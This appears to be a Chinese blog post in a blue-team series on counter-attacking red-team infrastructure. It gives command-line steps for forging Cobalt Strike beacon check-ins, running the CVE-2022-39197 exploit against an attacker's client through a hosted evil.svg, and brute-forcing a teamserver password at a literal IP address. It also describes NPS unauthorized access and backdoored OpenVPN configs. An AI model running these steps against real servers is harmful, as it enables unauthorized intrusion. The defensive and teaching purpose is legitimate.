蓝队技能-溯源反制篇&暴打红队&C2远控&CS批量上线&CVE漏洞&口令爆破&NPS未授权

Ethan医生1个月前信息收集80

 蓝队技能-溯源反制-C2CS&应用平台

#溯源反制-远程控制工具-CobaltStrike

对抗Cobaltstrike中的手段:

1、伪造流量批量上线(欺骗防御)

条件:知道对方的CS的服务端地址,开启了http监听器

参考:https://mp.weixin.qq.com/s/i79ziHSIVaJ7mqBfnewRZQ

-抓包木马进程流量

会话删除掉后重发包可上线

 

-解密Cookie加密数据

https://github.com/Sentinel-One/CobaltStrikeParser

生成checksum8路径:d:\Python3.8\python.exe check_url.py

解密数据获取密钥:python parse_beacon_config.py mm7L --json > mm7L.json

 

-利用批量脚本重放上线

https://github.com/LiAoRJ/CS_fakesubmit

填写密钥及修改上线信息后启动脚本

d:\Python3.8\python.exe cs_fakesubmit.py

python parse_beacon_config.py mm7L --json > mm7L.json

 

 

2、利用漏洞(CVE-2022-39197)

条件:机器被CS控制的木马程序 Cobalt Strike <=4.7 XSS 操作过进程管理

• 获取真实ip地址

• 获取NTLM

• RCE

• SSRF

https://github.com/its-arun/CVE-2022-39197

取得红队木马样本开始操作如下:

-蓝队修改EXP里面的执行命令后编译(红队客户端触发的东西在这里修改)

修改:EvilJar/src/main/java/Exploit.java

-蓝队修改svg加载地址并架设Web服务(红队的CS服务器能访问的Web服务)

修改:evil.svg 指向url地址

python -m http.server 8888

-蓝队执行EXP调用后门上线,攻击者进程查看时触发

python cve-2022-39197.py beacon.exe http://可访问的WEB:8888/evil.svg

 

3、反制Server,爆破密码(通用)

条件:知道对方的CS的服务端地址

针对没有采用隐匿C2地址的技术导致的反制(后门样本被溯源到C2地址)

https://github.com/ryanohoro/csbruter

python csbruter.py 47.94.236.117 pass.txt

 

4、旁站反制

由于CS服务器经常会部署不止于CS服务端的应用,

还会搭建NPS,ARL灯塔等,可采用未授权或默认密码进行反制

例子:NPS未授权

https://github.com/weishen250/npscrack

https://mp.weixin.qq.com/s/ASrWlMM4QfnkqvAMVyN6GA

 

通过蜜罐反制

主要就是下述反制手段做操作

1. 可克隆相关系统页面,伪装“漏洞”系统

2. 互联网端投饵,一般会在Github、Gitee、Coding上投放蜜标(有可能是个单独的网站地址、也有可能是个密码本引诱中招)

3. 利用JSONP、XSS、CSRF等前端类漏洞获取访问蜜标的攻击者网络身份(网络画像) 

 

邮件钓鱼反制

安全防护基础较好的厂商,一般来说除了出动0day,物理近源渗透以外,最常见的就是邮件钓鱼了,在厂商收到邮件钓鱼的情况下,我们可以采取化被动为主动的方式,假装咬钩,实际上诱导攻击者进入蜜网。 

 

渗透工具漏洞

可以尝试挖掘蚁剑、冰蝎、菜刀、BurpSuite、SQLmap、AWVS的0day漏洞(需要一定的技术水平),或利用历史漏洞部署相关环境进行反打 

 

OpenVPN配置后门

OpenVPN配置文件(OVPN文件,是提供给OpenVPN客户端或服务器的配置文件)是可以修改添加命令的。 

 

盲打攻击反制

攻击者可能通过盲打漏洞方式来获取权限,一般盲打都具备一个数据回传接口(攻击者需要接收Cookie之类的数据),接口在JavaScript代码中是可以寻找到的,我们可以利用数据回传接口做以下两件事情,并后续引导攻击者进入我们部署好的蜜罐。

1. 打脏数据回传给XSS平台

2. 打虚假数据回传给XSS平台 

 

通过攻击服务器端口/Web等漏洞

攻击者可能是通过自己搭建的公网服务器进行攻击的,或者是通过此服务器与后门进行通讯。其中服务器可能运行诸多服务,且未打补丁或设置强密码,导致防守方可进行反打。


标签: 蓝队技能

相关文章

蓝队技能-应急响应篇&Web入侵指南&后门查杀&日志分析&流量解密&攻击链梳理&排查口

蓝队技能-应急响应篇&Web入侵指南&后门查杀&日志分析&流量解密&攻击链梳理&排查口

➢ 蓝队技能-Web入侵-入口&查杀&攻击链等#Web攻击事件获取当前WEB环境的组成架构(脚本,数据库,中间件,系统等)分析思路:1、利用时间节点筛选日志行为2、利用对漏洞...

蓝队技能-应急响应篇&近源攻击&Docker镜像&容器分析&Dockfile路径定位&基线扫描

➢ 蓝队技能-Docker镜像-容器分析&处置配置&基线检测#Docker应急Docker拉取的镜像被攻击者拿下,植入后门或挖矿等恶意应用,那么该如何应急?1、启动镜像例子1...

蓝队技能-应急响应篇&Rookit后门&进程提取&网络发现&隐藏技术&Linux杀毒&OpenArk

➢ 蓝队技能-Rookit技术-Linux&Win系统&进程隐藏&网络隐藏Windows-Rootkit演示:演示项目:https://bytecode77.com/...

蓝队技能-应急响应篇&ELK系统&日志采集分析&Yara规则&样本识别&特征提取&规则编写

➢ 蓝队技能-工具项目-ELK日志系统&采集分析&导入分析➢ 蓝队技能-工具项目-Yara威胁感知&规则解析&规则开发#ELK专业系统日志分析Ela...

蓝队技能-应急响应篇&内网攻防&爆破事件&代理隧道&流量提进程&系统日志&处置封锁

➢ 蓝队技能-内网攻防-口令爆破&隧道技术&排查&应急#口令横向场景说明:不管在内网还是在外网,协议口令爆破一直是攻击最常见的方式。1、明确对应口令爆破的日志存储路径...

蓝队技能-溯源反制篇&暴打红队&蜜罐读取&IDE上线&蚁剑RCE&Goby资产&Sqlmap命令

➢ 蓝队技能-溯源反制-蜜罐&安全工具#溯源反制-蜜罐-伪装MYSQL当红队小子对目标进行扫描时,发下存在MYSQL安全问题去利用,便会落入蓝队的陷阱https://github.c...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。